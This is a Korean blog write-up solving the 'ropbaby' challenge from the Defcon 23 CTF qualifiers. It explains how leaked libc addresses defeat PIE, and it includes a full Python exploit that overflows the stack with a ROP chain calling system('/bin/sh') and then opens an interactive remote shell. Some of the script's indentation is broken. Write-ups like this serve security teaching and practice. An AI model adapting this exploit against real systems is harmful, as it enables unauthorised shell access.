Defcon 23 Prequals

ETC

Defcon 23 Prequals - ropbaby

LF0827 2015. 6. 12. 18:31

ropbaby 문제는 다음과 같은 보호기법을 가지고 있습니다.

RELRO STACK CANARY NX PIE RPATH RUNPATH FILE

No RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH ./ropbaby

PIE 보호기법은 공격시 바이너리 주소를 이용하지 못하도록 파일을 실행 할 때마다 해당 주소를 랜덤하게 바꿔주는 것인데, 이 랜덤하게 바뀌는 것이 ASLR의 랜덤 라이브러리의 주소 할당 방식과 동일하다고 알고 있습니다.(소스코드를 보거나 하지 않아서 확실하지 않음)

그러므로 라이브러리 주소와 바이너리 주소가 랜덤하게 계속 바뀌지만 위와 같은 특성으로 어느 한 지점(라이브러리주소 or 바이너리주소)으로부터 내가 공격에 사용하길 원하는 값이 위치한 오프셋이 동일하다는 것을 알 수 있습니다.

이점을 이용하여 PIE를 우회하고 공격 페이로드에 바이너리 주소를 사용하기 위해서는 라이브러리나 바이너리의 주소 값을 릭하면 되는데, ropbaby라서 그런지 대놓고 libc의 주소값을 줍니다. (아래 사진 참고)

또한, 위 사진에서 3번 메뉴를 보면 최대 1024 바이트의 값을 입력받게 되고, 4번 메뉴를 선택하여 종료하면 bof로 인해 rip가 바로 변조됨을 알 수 있습니다.

따라서, PIE 보호기법을 우회하여 공격 페이로드를 짜기 위해 다음과 같은 정보가 필요한데, 위 메뉴에서 손쉽게 바로 구할 수 있습니다.

1. libc 주소 => 1번 메뉴로 얻음

2. system() 주소 => 2번 메뉴로 얻음

3. "/bin/sh" 주소 => 대회 서버와 동일한 환경에서 libc에 있는 "/bin/sh" 문자열과 2번에서 얻은 system() 주소간 오프셋으로 얻음

4. "pop rdi, ret" 주소 => 1번에서 얻은 libc 주소에서 해당 가젯까지와의 오프셋으로 얻음

import socket
import time
import struct
import re

def p(x):
    return struct.pack("<Q", x)

def up(x):
    return struct.unpack("<Q", x)[0]

def conn():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.0.17", 6669))
    return s

def read_until(s, string):
    data = ''
    while string not in data:
        data += s.recv(1)
    return data

def extract_hex(string):
    m = re.compile('0x[\w]{16}')
    result = m.findall(string)
    return result.pop()

def select_menu(s, num):
    read_until(s, ": ")
    s.send(str(num)+'\n')
    if num == 2:
        read_until(s, "symbol: ")
    elif num == 3:
        read_until(s, '1024): ')
    elif num == 4:
        read_until(s, 'Exiting.\n')
    
if __name__ == "__main__":

s = conn()

# 1) Get libc address
    select_menu(s, 1)
    libc_addr = int(extract_hex(s.recv(100)), 16)
    print "[+] libc_addr :", hex(libc_addr)

# 2) Get address of a libc function : system
    select_menu(s, 2)
    s.send("system\n")
    system_addr = int(extract_hex(s.recv(100)), 16)
    print "[+] system_addr :", hex(system_addr)

# Calc &"/bin/sh"
    system_and_binsh_offset = 0x1372d5
    binsh = system_addr + system_and_binsh_offset
    print "[+] /bin/sh string:", hex(binsh)

# Calc 'pop rdi, ret' gadget    
    popret_and_libc_offset = 0x4573
    pop_rdi = libc_addr + popret_and_libc_offset
    print "[+] pop rdi, ret gadget :", hex(pop_rdi)

payload = ''
    payload += p(0xdeadbeefdeadbeef)
    payload += p(pop_rdi)# pop rdi, ret
    payload += p(binsh)#/bin/sh
    payload += p(system_addr)

# 3) Nom nom r0p buffer to stack
    select_menu(s, 3)
    s.send(str(len(payload)+1)+"\n")
    s.send(payload+'\n')

# 4) Exit
    select_menu(s, 4)

print ''
    while 1:
        cmd = raw_input("# ")
        if len(cmd):
            s.send(cmd+'\n')
        else:
            continue
        print s.recv(4096)